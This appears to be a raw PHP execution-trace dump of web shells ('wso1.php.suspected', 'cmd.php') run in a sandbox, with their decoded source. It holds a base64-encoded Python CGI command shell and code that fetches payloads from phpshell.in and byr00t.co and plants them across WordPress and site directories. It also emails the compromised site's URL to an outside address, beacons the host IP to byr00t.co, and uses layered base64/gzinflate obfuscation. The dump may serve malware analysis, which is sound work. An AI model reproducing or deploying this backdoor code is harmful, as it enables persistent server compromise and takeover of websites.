ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code	1	0
4	13	0	0.008384	1144192	base64_decode	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.008407	1144280
4	13	R			'http://byr00t.co/l-'
4	14	0	0.008424	1144248	GetIP	1		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.008438	1144248	getenv	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.008457	1144280
5	15	R			FALSE
5	16	0	0.008471	1144248	getenv	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.008498	1144280
5	16	R			FALSE
5	17	0	0.008512	1144248	getenv	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.008527	1144320
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008608	1144288
4	14	R			'127.0.0.1'
4	18	0	0.008625	1144328	base64_encode	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso1.php.suspected'
4	18	1	0.008641	1144456
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4	19	0	0.008677	1144320	function_exists	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008693	1144360
4	19	R			TRUE
4	20	0	0.008706	1144320	curl_init	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008730	1145232
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008759	1145232	curl_setopt	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4	21	1	0.008781	1145328
4	21	R			TRUE
4	22	0	0.008794	1145232	curl_setopt	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008811	1145328
4	22	R			TRUE
4	23	0	0.008823	1145232	curl_exec	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.053580	1145264
4	23	R			''
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.053648	1145232	curl_close	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.053716	1144376
4	24	R			NULL
4	25	0	0.053734	1144344	file_get_contents	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA=='
4	25	1	0.916635	1148056
4	25	R			''
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.916740	1148016	define	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.916759	1148120
4	26	R			TRUE
4	27	0	0.916774	1148048	strpos	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.916791	1148120
4	27	R			FALSE
4	28	0	0.916804	1148048	session_start	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.916898	1148800
4	28	R			TRUE
4	29	0	0.916913	1148800	error_reporting	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.916927	1148840
4	29	R			0
4	30	0	0.916940	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.916956	1148872
4	30	R			''
4	31	0	0.916969	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.916984	1148872
4	31	R			''
4	32	0	0.916996	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
4	32	1	0.917010	1148872
4	32	R			'1'
4	33	0	0.917022	1148800	ini_set	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	37	2	'max_execution_time'	0
4	33	1	0.917037	1148904
4	33	R			'30'
4	34	0	0.917050	1148800	set_time_limit	0		/var/www/html/uploads/wso1.php.suspected(4) : eval()'d code(1) : eval()'d code	38	1	0
4	34	1	0.917064	1148864
4	34	R			FALSE
3	12	1	0.917086	1150312
2	7	1	0.917105	1063288
1	3	1	0.917112	1061712
1	35	0	0.917119	1061744	Error->__toString	0		Unknown	0	0
2	36	0	0.917131	1061824	Error->getTraceAsString	0		Unknown	0	0
2	36	1	0.917143	1062080
2	36	R			'#0 /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.suspected(4): eval()\n#2 {main}'
1	35	1	0.917162	1066216
1	35	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso1.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso1.php.suspected(4): eval()\n#2 {main}'
			0.917214	986664
TRACE END   [2023-02-12 20:09:38.328391]

data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249133.7685.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:45:59.666336]
1	0	1	0.000148	393512
1	3	0	0.000376	426920	{main}	1		/var/www/html/uploads/cmd.php	0	0
1		A						/var/www/html/uploads/cmd.php	2	$stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1		A						/var/www/html/uploads/cmd.php	3	$stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2	4	0	0.000456	426920	base64_decode	0		/var/www/html/uploads/cmd.php	4	1	'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2	4	1	0.000476	427080
2	4	R			'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	0	0.000497	427048	gzinflate	0		/var/www/html/uploads/cmd.php	4	1	'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2	5	1	0.000519	427176
2	5	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	0	0.000537	427016	htmlspecialchars_decode	0		/var/www/html/uploads/cmd.php	4	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	6	1	0.000553	427048
2	6	R			'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2	7	0	0.000582	428576	eval	1	'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'	/var/www/html/uploads/cmd.php	4	0
3	8	0	0.000597	428576	strrev	0		/var/www/html/uploads/cmd.php(4) : eval()'d code	1	1	'==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3	8	1	0.000650	461376
3	8	R			'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	0	0.000696	461344	base64_decode	0		/var/www/html/uploads/cmd.php(4) : eval()'d code	1	1	'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3	9	1	0.000811	494144
